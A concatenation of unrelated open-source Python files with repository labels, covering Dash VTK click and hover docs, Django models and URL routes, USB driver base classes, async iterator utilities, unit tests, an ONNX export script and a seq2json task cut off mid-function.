|
wesleyacheng/dash-docs
| 379 |
103544
|
import dash_html_components as html
import dash_vtk
from dash_docs import tools
from dash_docs import styles
from dash_docs import reusable_components as rc
examples = tools.load_examples(__file__)
layout = html.Div([
rc.Markdown('''
# Click and Hover Callbacks
It's possible to create callbacks based on user clicks and hovering. First, you need to specify the `pickingModes` prop in
`dash_vtk.View` to be a list of modes you want to capture. The following values are accepted:
* `"click"`
* `"hover"`
Afterwards, you need to create callbacks where the inputs and states include one of the following read-only properties of `dash_vtk.View`.
* `clickInfo`: Called when the user clicks on an object.
* `hoverInfo`: Called when the user hovers over an object.
> The full documentation for `dash_vtk.View` can be found in the [API reference](/vtk/reference).
## Callback structure
You can notice that the `clickInfo` or `hoverInfo` data will be a dictionary with various keys describing the picked object. The keys include:
* `displayPosition`: The x,y,z coordinate with on the user's screen.
* `ray`: A line between two points in 3D space (xyz1, xyz2) that represent the mouse position. It covers the full space under the 2D mouse position.
* `representationId`: The ID assigned to the `dash_vtk.GeometryRepresentation` containing your object.
* `worldPosition`: The x, y, z coordinates in the 3D environment that you are rendering where the ray hit the object. It corresponds to the 3D coordinate on the surface of the object under your mouse.
'''),
rc.Markdown('''
## Output `clickInfo` to `html.Pre`
The following example shows you how to concisely display the output of `clickInfo` inside an `html.Pre`:
'''),
html.Details(open=False, children=[
html.Summary('View full code'),
rc.Markdown(
examples['t07_click_info.py'][0],
style=styles.code_container
),
]),
html.Div(
examples['t07_click_info.py'][1],
className='example-container'
),
rc.Markdown('''
## Update representation state with `hoverInfo`
You can also construct more complex hover callbacks, which would affect the `actor` and `state` of your geometry representations.
In the [terrain mesh demo](https://dash-gallery.plotly.host/dash-vtk-explorer/pyvista-terrain-following-mesh), whenever you hover
over the surface, a callback is fired and the output is displayed on your screen:

The full code can be found [here](https://github.com/plotly/dash-vtk/tree/master/demos/pyvista-terrain-following-mesh), but the
following snippet summarizes what is needed to capture hover events in the image above:
```py
# ...
vtk_view = dash_vtk.View(
id="vtk-view",
pickingModes=["hover"],
children=[
dash_vtk.GeometryRepresentation(id="vtk-representation", ...),
dash_vtk.GeometryRepresentation(
id="pick-rep",
children=[
dash_vtk.Algorithm(id="pick-sphere", ...)
],
# ...
),
],
)
app.layout = html.Div([
# ...,
vtk_view,
# ...
])
@app.callback(
[
Output("tooltip", "children"),
Output("pick-sphere", "state"),
Output("pick-rep", "actor"),
],
[Input("vtk-view", "clickInfo"), Input("vtk-view", "hoverInfo")],
)
def onInfo(clickData, hoverData):
info = hoverData if hoverData else clickData
if info:
if (
"representationId" in info
and info["representationId"] == "vtk-representation"
):
return (
[json.dumps(info, indent=2)],
{"center": info["worldPosition"]},
{"visibility": True},
)
return dash.no_update, dash.no_update, dash.no_update
return [""], {}, {"visibility": False}
```
You can also use `hoverInfo` to update the state of another geometry representation. The image below shows how to update a cone position, orientation and size in order to probe the race car object:

Learn more by reading the [source code](https://github.com/plotly/dash-sample-apps/tree/master/apps/dash-vehicle-geometry) or trying out the [Vehicle Geometry app](https://dash-gallery.plotly.host/dash-vehicle-geometry/).
'''),
])
|
nikola/packages/tzlocal/__init__.py
|
asmeurer/nikola
| 1,901 |
103547
|
<filename>nikola/packages/tzlocal/__init__.py<gh_stars>1000+
"""Try to figure out what your local timezone is."""
import sys
__version__ = "2.0.0-nikola"
if sys.platform == "win32":
from .win32 import get_localzone, reload_localzone # NOQA
else:
from .unix import get_localzone, reload_localzone # NOQA
|
parsifal/apps/activities/models.py
|
ShivamPytho/parsifal
| 342 |
103560
|
<filename>parsifal/apps/activities/models.py
from django.contrib.auth.models import User
from django.db import models
from django.utils.translation import gettext_lazy as _
from parsifal.apps.activities.constants import ActivityTypes
from parsifal.apps.reviews.models import Review
class Activity(models.Model):
from_user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name=_("from user"))
to_user = models.ForeignKey(User, on_delete=models.CASCADE, related_name="+", null=True, verbose_name=_("to user"))
activity_type = models.CharField(_("type"), max_length=1, choices=ActivityTypes.CHOICES)
content = models.CharField(_("content"), max_length=500, blank=True)
review = models.ForeignKey(Review, on_delete=models.CASCADE, null=True, verbose_name=_("review"))
date = models.DateTimeField(_("date"), auto_now_add=True)
class Meta:
verbose_name = _("activity")
verbose_name_plural = _("activities")
def __str__(self):
return self.get_activity_type_display()
|
matchzoo/datasets/wiki_qa/__init__.py
|
ChrisRBXiong/MatchZoo-py
| 2,209 |
103580
|
<gh_stars>1000+
from .load_data import load_data
|
pmca/usb/driver/__init__.py
|
kubawolanin/Sony-PMCA-RE
| 1,313 |
103605
|
<reponame>kubawolanin/Sony-PMCA-RE<gh_stars>1000+
import abc
from collections import namedtuple
from ...util import *
USB_CLASS_PTP = 6
USB_CLASS_MSC = 8
USB_CLASS_VENDOR_SPECIFIC = 255
UsbDeviceHandle = namedtuple('UsbDeviceHandle', 'handle, idVendor, idProduct')
MSC_SENSE_OK = (0, 0, 0)
MSC_SENSE_ERROR_UNKNOWN = (0x2, 0xff, 0xff)
def parseMscSense(buffer):
return parse8(buffer[2:3]) & 0xf, parse8(buffer[12:13]), parse8(buffer[13:14])
class BaseUsbDriver(object):
def reset(self):
pass
class BaseMscDriver(BaseUsbDriver, abc.ABC):
@abc.abstractmethod
def sendCommand(self, command):
pass
@abc.abstractmethod
def sendWriteCommand(self, command, data):
pass
@abc.abstractmethod
def sendReadCommand(self, command, size):
pass
class BaseMtpDriver(BaseUsbDriver, abc.ABC):
@abc.abstractmethod
def sendCommand(self, code, args):
pass
@abc.abstractmethod
def sendWriteCommand(self, code, args, data):
pass
@abc.abstractmethod
def sendReadCommand(self, code, args):
pass
class BaseUsbContext(abc.ABC):
def __init__(self, name, classType):
self.name = name
self.classType = classType
def __enter__(self):
return self
def __exit__(self, *ex):
pass
@abc.abstractmethod
def listDevices(self, vendor):
pass
@abc.abstractmethod
def openDevice(self, device):
pass
|
monitoring/parse-html.py
|
2xsys/debian-server-tools
| 418 |
103627
|
#!/usr/bin/env python3
#
# Display download URL of a Firefox addon for Windows.
#
# Usage: ./parse-html.py adblock-plus
import sys
import urllib.request
from bs4 import BeautifulSoup
firefox_addon = 'https://addons.mozilla.org'
en_us_addons = firefox_addon + '/en-US/firefox/addon/'
page = urllib.request.urlopen(en_us_addons + sys.argv[1])
html = page.read()
soup = BeautifulSoup(html)
div = soup.find('p', attrs={'class' : 'install-button'})
print(firefox_addon + div.find('a', attrs={'class' : 'windows'})['href'])
|
web/public/python/static/defaultPython.py
|
zonglu666/teaching-open
| 119 |
103632
|
<reponame>zonglu666/teaching-open
import turtle
t = turtle.Turtle()
t.forward(100)
print ("Teaching Python Editor")
|
utils/xyz2obj.py
|
hengkaiz/Pixel2MeshPlusPlus
| 260 |
103640
|
# Copyright (C) 2019 <NAME>, <NAME>, <NAME>, <NAME>
# All rights reserved.
# This code is licensed under BSD 3-Clause License.
import sys
import os
import numpy as np
if __name__ == '__main__':
xyz_list_path = sys.argv[1]
xyzs = [xyz for xyz in os.listdir(xyz_list_path) if xyz.endswith('_predict_3.xyz')]
v = np.full([2466, 1], 'v')
for xyz in xyzs:
print(xyz)
obj_path = xyz.replace('.xyz', '.obj')
xyzf = np.loadtxt(os.path.join(xyz_list_path, xyz))
face = np.loadtxt('/home/wc/workspace/P2MPP/data/face3.obj', dtype='|S32')
out = np.vstack((np.hstack((v, xyzf)), face))
np.savetxt(os.path.join(xyz_list_path, obj_path), out, fmt='%s', delimiter=' ')
|
dojo/engagement/urls.py
|
axelpavageau/django-DefectDojo
| 1,772 |
103645
|
from django.conf.urls import url
from dojo.engagement import views
urlpatterns = [
# engagements and calendar
url(r'^calendar$', views.engagement_calendar, name='calendar'),
url(r'^calendar/engagements$', views.engagement_calendar, name='engagement_calendar'),
url(r'^engagement$', views.engagement, name='engagement'),
url(r'^engagements_all$', views.engagements_all, name='engagements_all'),
url(r'^engagement/(?P<eid>\d+)$', views.view_engagement,
name='view_engagement'),
url(r'^engagement/(?P<eid>\d+)/ics$', views.engagement_ics,
name='engagement_ics'),
url(r'^engagement/(?P<eid>\d+)/edit$', views.edit_engagement,
name='edit_engagement'),
url(r'^engagement/(?P<eid>\d+)/delete$', views.delete_engagement,
name='delete_engagement'),
url(r'^engagement/(?P<eid>\d+)/add_tests$', views.add_tests,
name='add_tests'),
url(r'^engagement/(?P<eid>\d+)/import_scan_results$',
views.import_scan_results, name='import_scan_results'),
url(r'^engagement/(?P<eid>\d+)/close$', views.close_eng,
name='close_engagement'),
url(r'^engagement/(?P<eid>\d+)/reopen$', views.reopen_eng,
name='reopen_engagement'),
url(r'^engagement/(?P<eid>\d+)/complete_checklist$',
views.complete_checklist, name='complete_checklist'),
url(r'^engagement/(?P<eid>\d+)/risk_acceptance/add$',
views.add_risk_acceptance, name='add_risk_acceptance'),
url(r'^engagement/(?P<eid>\d+)/risk_acceptance/add/(?P<fid>\d+)$',
views.add_risk_acceptance, name='add_risk_acceptance'),
url(r'^engagement/(?P<eid>\d+)/risk_acceptance/(?P<raid>\d+)$',
views.view_risk_acceptance, name='view_risk_acceptance'),
url(r'^engagement/(?P<eid>\d+)/risk_acceptance/(?P<raid>\d+)/edit$',
views.edit_risk_acceptance, name='edit_risk_acceptance'),
url(r'^engagement/(?P<eid>\d+)/risk_acceptance/(?P<raid>\d+)/expire$',
views.expire_risk_acceptance, name='expire_risk_acceptance'),
url(r'^engagement/(?P<eid>\d+)/risk_acceptance/(?P<raid>\d+)/reinstate$',
views.reinstate_risk_acceptance, name='reinstate_risk_acceptance'),
url(r'^engagement/(?P<eid>\d+)/risk_acceptance/(?P<raid>\d+)/delete$',
views.delete_risk_acceptance, name='delete_risk_acceptance'),
url(r'^engagement/(?P<eid>\d+)/risk_acceptance/(?P<raid>\d+)/download$',
views.download_risk_acceptance, name='download_risk_acceptance'),
url(r'^engagement/(?P<eid>\d+)/threatmodel$', views.view_threatmodel,
name='view_threatmodel'),
url(r'^engagement/(?P<eid>\d+)/threatmodel/upload$',
views.upload_threatmodel, name='upload_threatmodel'),
]
|
runners/builder.py
|
zhangzhengde0225/SwinTrack
| 143 |
103672
|
from core.run.event_dispatcher.register import EventRegister
def build_runner(model, runner_config, data_source_context, config, event_register: EventRegister):
if runner_config['type'] == 'default':
from .training.default.builder import build_default_training_runner
return build_default_training_runner(model, runner_config, data_source_context, config, event_register)
elif runner_config['type'] == 'default_evaluation' or runner_config['type'] == 'coarse_to_fine_evaluation':
from .evaluation.default import DefaultSiamFCEvaluator
return DefaultSiamFCEvaluator()
else:
raise NotImplementedError(runner_config['type'])
|
tests/patterns/test_UnaryOpPattern.py
|
josiah-wolf-oberholtzer/supriya
| 191 |
103688
|
<filename>tests/patterns/test_UnaryOpPattern.py
import pytest
from supriya.patterns import SequencePattern, UnaryOpPattern
from supriya.patterns.testutils import run_pattern_test
@pytest.mark.parametrize(
"stop_at, operator, input_, expected, is_infinite",
[
(None, "-", 1, [-1], True),
(None, "-", [1], [(-1,)], True),
(None, "-", [[1]], [((-1,),)], True),
(None, "-", [[[1]]], [(((-1,),),)], True),
(None, "-", [1, 2], [(-1, -2)], True),
(None, "-", SequencePattern([1, 2, 3]), [-1, -2, -3], False),
(None, "-", SequencePattern([1, 2, 3], None), [-1, -2, -3], True),
],
)
def test(stop_at, operator, input_, expected, is_infinite):
pattern = UnaryOpPattern(operator, input_)
run_pattern_test(pattern, expected, is_infinite, stop_at)
|
monitoring/grafana/setup.py
|
tsehori/grr
| 4,238 |
103698
|
import setuptools
setup_args = dict(
name="grr-grafanalib-dashboards",
description="GRR grafanalib Monitoring Dashboards",
license="Apache License, Version 2.0",
url="https://github.com/google/grr/tree/master/monitoring/grafana",
maintainer="GRR Development Team",
maintainer_email="<EMAIL>",
packages=setuptools.find_packages(),
install_requires=[
# It is mentioned in grafanalib docs that "We'll probably
# make changes that break backwards compatibility, although
# we'll try hard not to", so we stick with version 0.5.7.
"grafanalib==0.5.7",
],
)
setuptools.setup(**setup_args)
|
drl_grasping/envs/models/primitives/__init__.py
|
Tiamat-Tech/drl_grasping
| 126 |
103702
|
from .box import Box
from .cylinder import Cylinder
from .sphere import Sphere
from .random_primitive import RandomPrimitive
from .plane import Plane
|
aiomisc/iterator_wrapper.py
|
Alviner/aiomisc
| 232 |
103723
|
<reponame>Alviner/aiomisc
import asyncio
import inspect
import threading
from collections import deque
from concurrent.futures import Executor
from types import TracebackType
from typing import (
Any, AsyncIterator, Awaitable, Callable, Deque, Generator, NoReturn,
Optional, Type, TypeVar,
)
from weakref import finalize
from aiomisc.counters import Statistic
T = TypeVar("T")
R = TypeVar("R")
GenType = Generator[T, R, None]
FuncType = Callable[[], GenType]
class ChannelClosed(RuntimeError):
pass
class FromThreadChannel:
def __init__(self, maxsize: int, loop: asyncio.AbstractEventLoop):
self.loop = loop
self.maxsize: int = maxsize
self.queue: Deque[Any] = deque()
self.__close_event = threading.Event()
self.__write_condition = threading.Condition()
self.__read_condition = asyncio.Condition()
def __notify_readers(self) -> None:
def notify() -> None:
async def notify_all() -> None:
async with self.__read_condition:
self.__read_condition.notify_all()
self.loop.create_task(notify_all())
self.loop.call_soon_threadsafe(notify)
def __notify_writers(self) -> None:
with self.__write_condition:
self.__write_condition.notify_all()
def close(self) -> None:
if self.is_closed:
return
self.__close_event.set()
self.__notify_readers()
self.__notify_writers()
@property
def is_overflow(self) -> bool:
if self.maxsize > 0:
return len(self.queue) >= self.maxsize
return False
@property
def is_empty(self) -> bool:
return len(self.queue) == 0
@property
def is_closed(self) -> bool:
return self.__close_event.is_set()
def __enter__(self) -> "FromThreadChannel":
return self
def __exit__(
self, exc_type: Type[Exception],
exc_val: Exception, exc_tb: TracebackType,
) -> None:
self.close()
def put(self, item: Any) -> None:
def predicate() -> bool:
return self.is_closed or not self.is_overflow
with self.__write_condition:
self.__write_condition.wait_for(predicate)
if self.is_closed:
raise ChannelClosed
self.queue.append(item)
self.__notify_readers()
async def get(self) -> Any:
def predicate() -> bool:
return self.is_closed or not self.is_empty
async with self.__read_condition:
await self.__read_condition.wait_for(predicate)
if self.is_closed and self.is_empty:
raise ChannelClosed
try:
return self.queue.popleft()
finally:
self.__notify_writers()
class IteratorWrapperStatistic(Statistic):
started: int
queue_size: int
queue_length: int
yielded: int
enqueued: int
class IteratorWrapper(AsyncIterator):
__slots__ = (
"__channel",
"__close_event",
"__gen_func",
"__gen_task",
"_statistic",
"executor",
"loop",
)
def __init__(
self, gen_func: FuncType, loop: asyncio.AbstractEventLoop = None,
max_size: int = 0, executor: Executor = None,
statistic_name: Optional[str] = None,
):
current_loop = loop or asyncio.get_event_loop()
self.loop: asyncio.AbstractEventLoop = current_loop
self.executor = executor
self.__close_event = asyncio.Event()
self.__channel: FromThreadChannel = FromThreadChannel(
maxsize=max_size, loop=self.loop,
)
self.__gen_task: Optional[asyncio.Task] = None
self.__gen_func: Callable = gen_func
self._statistic = IteratorWrapperStatistic(statistic_name)
self._statistic.queue_size = max_size
@property
def closed(self) -> bool:
return self.__channel.is_closed
@staticmethod
def __throw(_: Any) -> NoReturn:
pass
def _in_thread(self) -> None:
self._statistic.started += 1
with self.__channel:
try:
gen = iter(self.__gen_func())
throw = self.__throw
if inspect.isgenerator(gen):
throw = gen.throw # type: ignore
while not self.closed:
item = next(gen)
try:
self.__channel.put((item, False))
except Exception as e:
throw(e)
self.__channel.close()
break
finally:
del item
self._statistic.enqueued += 1
except StopIteration:
return
except Exception as e:
if self.closed:
return
self.__channel.put((e, True))
finally:
self._statistic.started -= 1
self.loop.call_soon_threadsafe(self.__close_event.set)
async def _run(self) -> Any:
return await self.loop.run_in_executor(
self.executor, self._in_thread,
)
def close(self) -> Awaitable[None]:
self.__channel.close()
if self.__gen_task is not None and not self.__gen_task.done():
self.__gen_task.cancel()
return asyncio.ensure_future(self.wait_closed())
async def wait_closed(self) -> None:
await self.__close_event.wait()
if self.__gen_task:
await asyncio.gather(self.__gen_task, return_exceptions=True)
def __aiter__(self) -> AsyncIterator[Any]:
if self.__gen_task is None:
self.__gen_task = self.loop.create_task(self._run())
return IteratorProxy(self, self.close)
async def __anext__(self) -> Awaitable[T]:
try:
item, is_exc = await self.__channel.get()
except ChannelClosed:
await self.wait_closed()
raise StopAsyncIteration
if is_exc:
await self.close()
raise item from item
self._statistic.yielded += 1
return item
async def __aenter__(self) -> "IteratorWrapper":
return self
async def __aexit__(
self, exc_type: Any, exc_val: Any,
exc_tb: Any,
) -> None:
if self.closed:
return
await self.close()
class IteratorProxy(AsyncIterator):
def __init__(
self, iterator: AsyncIterator,
finalizer: Callable[[], Any],
):
self.__iterator = iterator
finalize(self, finalizer)
def __anext__(self) -> Awaitable[Any]:
return self.__iterator.__anext__()
|
tests/grammars/CustomSubclassGenerator.py
|
38b394ce01/grammarinator
| 228 |
103737
|
# Copyright (c) 2017-2020 <NAME>, <NAME>.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
# This custom unparser is used by Custom.g4
from grammarinator.runtime import *
from CustomGenerator import CustomGenerator
class CustomSubclassGenerator(CustomGenerator):
def tagname(self, parent=None):
current = UnparserRule(name='tagname', parent=parent)
UnlexerRule(src='customtag', parent=current)
return current
def _custom_lexer_content(self, parent=None):
return UnlexerRule(src='custom content', parent=parent)
|
paperbroker/adapters/quotes/QuoteAdapter.py
|
yutiansut/paperbroker
| 227 |
103774
|
<reponame>yutiansut/paperbroker
import arrow
class QuoteAdapter:
def get_quote(self, asset):
raise NotImplementedError("QuoteAdapter.get_quote: You should subclass this and create an adapter.")
def get_options(self, underlying_asset=None, expiration_date=None):
raise NotImplementedError("QuoteAdapter.get_options: You should subclass this and create an adapter.")
def get_expiration_dates(self, underlying_asset=None):
raise NotImplementedError("QuoteAdapter.get_expiration_dates: You should subclass this and create an adapter.")
|
tests/active_learning/test_ScorerClassification.py
|
CodeGuy-007/lightly
| 1,515 |
103800
|
<reponame>CodeGuy-007/lightly<gh_stars>1000+
import unittest
import numpy as np
from lightly.active_learning.scorers.classification import ScorerClassification, _entropy
class TestScorerClassification(unittest.TestCase):
def test_score_calculation_random(self):
n_samples = 10000
n_classes = 10
np.random.seed(42)
predictions = np.random.rand(n_samples, n_classes)
predictions_normalized = predictions / np.sum(predictions, axis=1)[:, np.newaxis]
model_output = predictions_normalized
scorer = ScorerClassification(model_output)
scores = scorer.calculate_scores()
self.assertEqual(set(scores.keys()), set(ScorerClassification.score_names()))
for score_name, score in scores.items():
self.assertEqual(score.shape, (n_samples,))
self.assertTrue(all(score >= 0))
self.assertTrue(all(score <= 1))
self.assertEqual(type(score), np.ndarray)
def test_score_calculation_specific(self):
model_output = [
[0.7, 0.2, 0.1],
[0.4, 0.5, 0.1]
]
model_output = np.array(model_output)
scorer = ScorerClassification(model_output)
scores = scorer.calculate_scores()
self.assertListEqual(list(scores["uncertainty_least_confidence"]),
[(1 - 0.7) / (1 - 1. / 3.), (1 - 0.5) / (1 - 1. / 3.)])
self.assertListEqual(list(scores["uncertainty_margin"]), [1 - (0.7 - 0.2), 1 - (0.5 - 0.4)])
for val1, val2 in zip(scores["uncertainty_entropy"], _entropy(model_output) / np.log2(3)):
self.assertAlmostEqual(val1, val2, places=8)
def test_score_calculation_binary(self):
model_output = [
[0.7],
[0.4]
]
model_output = np.array(model_output)
scorer = ScorerClassification(model_output)
scores = scorer.calculate_scores()
self.assertListEqual(list(scores["uncertainty_least_confidence"]),
[(1 - 0.7) / (1 - 1. / 2.), (1 - 0.6) / (1 - 1. / 2.)])
self.assertListEqual(list(scores["uncertainty_margin"]), [1 - (0.7 - 0.3), 1 - (0.6 - 0.4)])
model_output = np.concatenate([model_output, 1-model_output], axis=1)
for val1, val2 in zip(scores["uncertainty_entropy"], _entropy(model_output) / np.log2(2)):
self.assertAlmostEqual(val1, val2, places=8)
def test_scorer_classification_empty_model_output(self):
scorer = ScorerClassification(model_output=[])
scores = scorer.calculate_scores()
self.assertEqual(set(scores.keys()), set(ScorerClassification.score_names()))
def test_scorer_classification_variable_model_output_dimension(self):
for num_samples in range(5):
for num_classes in range(5):
with self.subTest(msg=f"model_output.shape = ({num_samples},{num_classes})"):
if num_samples > 0:
preds = [1. / num_samples] * num_classes
else:
preds = []
model_output = [preds] * num_samples
if num_classes == 0 and num_samples > 0:
with self.assertRaises(ValueError):
scorer = ScorerClassification(model_output=model_output)
else:
scorer = ScorerClassification(model_output=model_output)
scores = scorer.calculate_scores()
self.assertEqual(set(scores.keys()), set(ScorerClassification.score_names()))
for score_values in scores.values():
self.assertEqual(len(score_values), len(model_output))
self.assertEqual(type(score_values), np.ndarray)
def test_scorer_classification_variable_model_output_tensor_order(self):
for tensor_order in range(1, 5):
model_output = np.ndarray((3,) * tensor_order)
with self.subTest(msg=f"model_output.shape = {model_output.shape}"):
if tensor_order == 2 or tensor_order == 0:
scorer = ScorerClassification(model_output=model_output)
scores = scorer.calculate_scores()
for score_values in scores.values():
self.assertEqual(type(score_values), np.ndarray)
else:
with self.assertRaises(ValueError):
scorer = ScorerClassification(model_output=model_output)
|
tests/components/kraken/conftest.py
|
MrDelik/core
| 30,023 |
103823
|
"""Provide common pytest fixtures for kraken tests."""
from unittest.mock import patch
import pytest
@pytest.fixture(autouse=True)
def mock_call_rate_limit_sleep():
"""Patch the call rate limit sleep time."""
with patch("homeassistant.components.kraken.CALL_RATE_LIMIT_SLEEP", new=0):
yield
|
Validation/EventGenerator/python/BPhysicsValidation_cfi.py
|
ckamtsikis/cmssw
| 852 |
103836
|
<reponame>ckamtsikis/cmssw<gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer
JPsiMuMuValidation = DQMEDAnalyzer('BPhysicsValidation',
genparticleCollection = cms.InputTag("genParticles",""),
name = cms.string("JPsiMuMuValidation"),
pname = cms.string("J/#Psi"),
pdgid = cms.int32(443),
massmin = cms.double(3.0),
massmax = cms.double(4.0),
daughters = cms.vstring("muminus","muplus"),
muminus = cms.untracked.PSet(pname = cms.string("#mu^{-}"),
pdgid = cms.int32(13),
massmin = cms.double(0.1),
massmax = cms.double(0.2),
),
muplus = cms.untracked.PSet(pname = cms.string("#mu^{+}"),
pdgid = cms.int32(-13),
massmin = cms.double(0.1),
massmax = cms.double(0.2),
)
)
LambdabPiPiMuMuValidation = DQMEDAnalyzer('BPhysicsValidation',
genparticleCollection = cms.InputTag("genParticles",""),
name = cms.string("LambdabPiPiMuMuValidation"),
pname = cms.string("#Lambda_{b}"),
pdgid = cms.int32(5122),
massmin = cms.double(5.5),
massmax = cms.double(6.0),
daughters = cms.vstring("muminus","muplus","piminus","piplus","pminus","pplus","Lambda","Lambdabar"),
muminus = cms.untracked.PSet(pname = cms.string("#mu^{-}"),
pdgid = cms.int32(13),
massmin = cms.double(0.1),
massmax = cms.double(0.2),
),
muplus = cms.untracked.PSet(pname = cms.string("#mu^{+}"),
pdgid = cms.int32(-13),
massmin = cms.double(0.1),
massmax = cms.double(0.2),
),
piminus = cms.untracked.PSet(pname = cms.string("#pi^{-}"),
pdgid = cms.int32(-211),
massmin = cms.double(0.1),
massmax = cms.double(0.2),
),
piplus = cms.untracked.PSet(pname = cms.string("#pi^{+}"),
pdgid = cms.int32(211),
massmin = cms.double(0.1),
massmax = cms.double(0.2),
),
pminus = cms.untracked.PSet(pname = cms.string("p^{-}"),
pdgid = cms.int32(-2212),
massmin = cms.double(0.9),
massmax = cms.double(1.1),
),
pplus = cms.untracked.PSet(pname = cms.string("p^{+}"),
pdgid = cms.int32(2212),
massmin = cms.double(0.9),
massmax = cms.double(1.1),
),
Lambda = cms.untracked.PSet(pname = cms.string("#Lambda"),
pdgid = cms.int32(3122),
massmin = cms.double(1.0),
massmax = cms.double(1.2),
),
Lambdabar = cms.untracked.PSet(pname = cms.string("#bar{#Lambda}"),
pdgid = cms.int32(-3122),
massmin = cms.double(1.0),
massmax = cms.double(1.2),
)
)
PsiSpectrum = DQMEDAnalyzer('BPhysicsSpectrum',
genparticleCollection = cms.InputTag("genParticles",""),
name = cms.string("JPsiSpectrum"),
pdgids = cms.vint32(443,100443,30443,9000443,9010443,9020443),
massmin = cms.double(3.0),
massmax = cms.double(4.5)
)
LambdaSpectrum = DQMEDAnalyzer('BPhysicsSpectrum',
genparticleCollection = cms.InputTag("genParticles",""),
name = cms.string("LambdaSpectrum"),
pdgids = cms.vint32(5122),
massmin = cms.double(5.5),
massmax = cms.double(6.0)
)
|
pymoo/experimental/deriv/gd.py
|
jarreguit/pymoo
| 762 |
103860
|
import numpy as np
from pymoo.experimental.deriv import DerivationBasedAlgorithm
from pymoo.algorithms.base.line import LineSearchProblem
from pymoo.algorithms.soo.univariate.exp import ExponentialSearch
from pymoo.algorithms.soo.univariate.golden import GoldenSectionSearch
from pymoo.core.population import Population
from pymoo.util.vectors import max_alpha
class GradientDescent(DerivationBasedAlgorithm):
def direction(self, dF, **kwargs):
return - dF
def step(self):
problem, sol = self.problem, self.opt[0]
self.evaluator.eval(self.problem, sol, evaluate_values_of=["dF"])
dF = sol.get("dF")[0]
print(sol)
if np.linalg.norm(dF) ** 2 < 1e-8:
self.termination.force_termination = True
return
direction = self.direction(dF)
line = LineSearchProblem(self.problem, sol, direction, strict_bounds=self.strict_bounds)
alpha = self.alpha
if self.strict_bounds:
if problem.has_bounds():
line.xu = np.array([max_alpha(sol.X, direction, *problem.bounds(), mode="all_hit_bounds")])
# remember the step length from the last run
alpha = min(alpha, line.xu[0])
if alpha == 0:
self.termination.force_termination = True
return
# make the solution to be the starting point of the univariate search
x0 = sol.copy(deep=True)
x0.set("__X__", x0.get("X"))
x0.set("X", np.zeros(1))
# determine the brackets to be searched in
exp = ExponentialSearch(delta=alpha).setup(line, evaluator=self.evaluator, termination=("n_iter", 20), x0=x0)
a, b = exp.run().pop[-2:]
# search in the brackets
res = GoldenSectionSearch().setup(line, evaluator=self.evaluator, termination=("n_iter", 20), a=a, b=b).run()
infill = res.opt[0]
# set the alpha value and revert the X to be the multi-variate one
infill.set("X", infill.get("__X__"))
self.alpha = infill.get("alpha")[0]
# keep always a few historical solutions
self.pop = Population.merge(self.pop, infill)[-10:]
|
tools/torch2onnx.py
|
YuxinZou/vedaseg
| 438 |
103865
|
import argparse
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../'))
import torch
from volksdep.converters import torch2onnx
from vedaseg.runners import InferenceRunner
from vedaseg.utils import Config
def parse_args():
parser = argparse.ArgumentParser(description='Convert to Onnx model.')
parser.add_argument('config', help='config file path')
parser.add_argument('checkpoint', help='checkpoint file path')
parser.add_argument('out', help='output onnx file name')
parser.add_argument('--dummy_input_shape', default='3,800,1344',
type=str, help='model input shape like 3,800,1344. '
'Shape format is CxHxW')
parser.add_argument('--dynamic_shape', default=False, action='store_true',
help='whether to use dynamic shape')
parser.add_argument('--opset_version', default=9, type=int,
help='onnx opset version')
parser.add_argument('--do_constant_folding', default=False,
action='store_true',
help='whether to apply constant-folding optimization')
parser.add_argument('--verbose', default=False, action='store_true',
help='whether print convert info')
args = parser.parse_args()
return args
def main():
args = parse_args()
cfg = Config.fromfile(args.config)
inference_cfg = cfg['inference']
common_cfg = cfg.get('common')
runner = InferenceRunner(inference_cfg, common_cfg)
assert runner.use_gpu, 'Please use valid gpu to export model.'
runner.load_checkpoint(args.checkpoint)
model = runner.model
shape = map(int, args.dummy_input_shape.split(','))
dummy_input = torch.randn(1, *shape)
if args.dynamic_shape:
print(f'Convert to Onnx with dynamic input shape and '
f'opset version {args.opset_version}')
else:
print(f'Convert to Onnx with constant input shape '
f'{args.dummy_input_shape} and '
f'opset version {args.opset_version}')
torch2onnx(model, dummy_input, args.out, dynamic_shape=args.dynamic_shape,
opset_version=args.opset_version,
do_constant_folding=args.do_constant_folding,
verbose=args.verbose)
print(f'Convert successfully, saved onnx file: {os.path.abspath(args.out)}')
if __name__ == '__main__':
main()
|
macarico/tasks/seq2json.py
|
hal3/macarico
| 121 |
103896
|
<filename>macarico/tasks/seq2json.py
from __future__ import division, generators, print_function
import sys
import random
import macarico
import zss
from macarico.data.vocabulary import EOS
def fold_json(f, x0, json):
if isinstance(json, int):
return f(x0, True, json)
if isinstance(json, list):
for x in json:
x0 = fold_json(f, x0, x)
return x0
if isinstance(json, dict):
for k, v in json.items():
x0 = f(x0, False, k)
x0 = fold_json(f, x0, v)
return x0
assert False
def map_json(f, json):
if isinstance(json, int):
return f(json)
if isinstance(json, list):
return [map_json(f, j) for j in json]
if isinstance(json, dict):
return { f(k): map_json(f, j) for k, j in json.items() }
assert False
def get_max_key(json):
return fold_json(lambda x0, k, _: x0 if k is None else max(x0, k), 0, json)
def get_max_ident(json):
return fold_json(lambda x0, _, v: x0 if v is None else max(x0, v), 0, json)
class Seq2JSONExample(macarico.Example):
def __init__(self, tokens, out_json):
super(Seq2JSONExample, self).__init__(tokens, out_json)
#self.tokens = tokens
#self.truth = out_json
self.n_key = 1 + get_max_key(out_json)
self.n_ident = 1 + get_max_ident(out_json)
class Seq2JSON(macarico.Env):
NODE_ITEM, NODE_LIST, NODE_DICT = 0, 1, 2
def __init__(self, ex, n_key, n_ident, max_depth=40, max_length=5, T=1000):
macarico.Env.__init__(self, n_key + n_ident + 3 + 2, T, ex)
self.n_key = n_key
self.n_ident = n_ident
self.max_depth = max_depth
self.max_length = max_length
self.Y = ex.Y
self.X = ex.X
assert(ex.X[-1] == EOS)
self.X = ex.X
self.actions_node_type = set([0,1,2])
self.actions_stop = set([3,4])
self.actions_string = set([i+5 for i in range(n_ident)])
self.actions_key = set([i+5+n_ident for i in range(n_key)])
def _run_episode(self, policy):
self.policy = policy
self.depth = 0
self.count = 0
#print('self.Y =', self.Y)
